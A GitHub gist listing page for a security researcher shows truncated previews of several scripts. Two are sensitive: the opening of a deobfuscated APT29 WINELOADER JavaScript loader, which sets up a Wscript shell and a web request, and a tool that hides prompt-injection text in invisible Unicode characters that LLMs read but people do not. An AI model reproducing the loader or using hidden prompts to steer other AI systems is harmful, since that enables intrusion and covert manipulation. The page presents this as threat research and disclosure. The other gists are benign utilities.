Shadow0pz Shadow0ps

@Shadow0ps
Shadow0ps / APT29 WINELOADER SCRIPT.JS
Created March 25, 2024 23:18
An easier to read and understand version of the loader used by APT29 for WINELOADER. RE: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties
// Create a new ActiveXObject for Wscript.Shell
var shell = new ActiveXObject("Wscript.Shell");
// Define the Main function with a parameter for the URL
function Main(url) {
// Create a new XMLHttpRequest object
var request = new XMLHttpRequest();
// Define an event handler for when the request state changes
request.onreadystatechange = function () {
@Shadow0ps
Shadow0ps / Unighost_Prompt_Injection.py
Created January 12, 2024 07:15
Converts ASCII Prompts to Unicode Generating “Invisible” Prompts
#This script helps generate Unicode which is essentially hidden or "invisible" but is easily read by LLMs, especially those that do not rely on a UI or prescreening of prompts via API submission.
#This won't be published until someone else discovers it, as it's too "valuable" to threat actors to publish given currently available mitigations.
# V1.0: TLP RED! Do Not Distribute! Category: Hidden Injection Prompt! - 09/2023 - ShadowOpz
# V2.0: TLP RED! Feature update: Added invisible clipboard functionality.
# V3.0: Public Disclosure from Twitter discovered. Notes below.
# V3.0 Notes: Released to public Gist 01/12/2024 after public disclosure from Twitter.
# Kudos to @rezo_ and @goodside for the discovery and their pyperclip version.
@Shadow0ps
Shadow0ps / EOMTv2.2.ps1
Last active October 5, 2022 15:42
Updated EOMTv2 URL Mitigation Script for ProxyNotShell 0-Day Protections (This is NOT Microsoft's Mitigation, which is broken as of 10-5-2022)
<#
MIT License
Copyright (c) Microsoft Corporation.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
@Shadow0ps
Shadow0ps / minecraftfinder.py
Created June 15, 2021 21:11
A silly little script I fixed up to generate a list of Shodan results with Minecraft Server Information.
#Use Shodan Search API Query product:minecraft to return a list of minecraft servers and their details
#Example Output:
#Players: 0 online - 250 maximum
#Version: Paper 1.16.5 (protocol 754)
#Description: Welcome to USC FOP 2021's Minecraft Server!
#51.79.242.64
#['ovh.ca']
#Minecraft Server
#Don't forget to add your own Shodan API Key below first
#Usage is python3 minecraftfinder.py product:minecraft
@Shadow0ps
Shadow0ps / App Short URI OSX & IOS.txt
Last active February 8, 2021 21:17
Example Apple Application Short Links
aam:
acrobat2018:
acrobat:
adbps:
addressbook:
adl:
aem-asset:
afp:
apconfig:
apple-reference-documentation:
@Shadow0ps
Shadow0ps / RYUK UNC1878
Created October 29, 2020 12:52
UNC1978 IOCs from Mandiant Team
# C2 FQDNs
@Shadow0ps
Shadow0ps / NCMEC_REPORTER_PHOTODNA.PY
Created March 6, 2020 00:46
PHOTODNA API PYTHON SCRIPT FOR AUTOMATED NOTIFICATION TO NCMEC WITH ALL REQUIRED METADATA. REQUIRES DATA GUARDIAN OR OTHER 3RD PARTY INTEGRATION FEED. LEARN MORE: SECURITY@CONDITION.BLACK
@Shadow0ps
Shadow0ps / hash160-to-base58.go
Created April 10, 2019 01:16 — forked from mathiasrw/hash160-to-base58.go
Convert hash160 hex strings to bitcoin base58 address
package main
import (
"bufio"
"encoding/hex"
"fmt"
"github.com/btcsuite/btcutil/base58"
"log"
"os"
)
// No Donut!
// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
// Not for malicious use. You assume all responsibility for anything you do with this. Don't be a jerk. If I find out you used this to hurt people.
// Just remember TAKEN. Get what I'm sayin?
@Shadow0ps
Shadow0ps / update.sh
Created July 10, 2018 19:22 — forked from Omeryl/update.sh
manage an OpenWRT LetsEncrypt https installation
#!/usr/bin/env sh
## update.sh - manage an OpenWRT LetsEncrypt https installation
# HOWTO:
# - put update.sh in its own directory (like /root/.https)
# - run ./update.sh your.domain.com (that domain needs to point to your router)
# * this gets an issued cert from letsencrypt.org using the webroot verification method
# * also installs curl and ca-certificates packages
# - use crontab -e; add the line `0 0 * * * "/root/.https/update.sh" >>/root/.https/log.txt 2>&`
# * this runs the update every day, logging everything to log.txt
#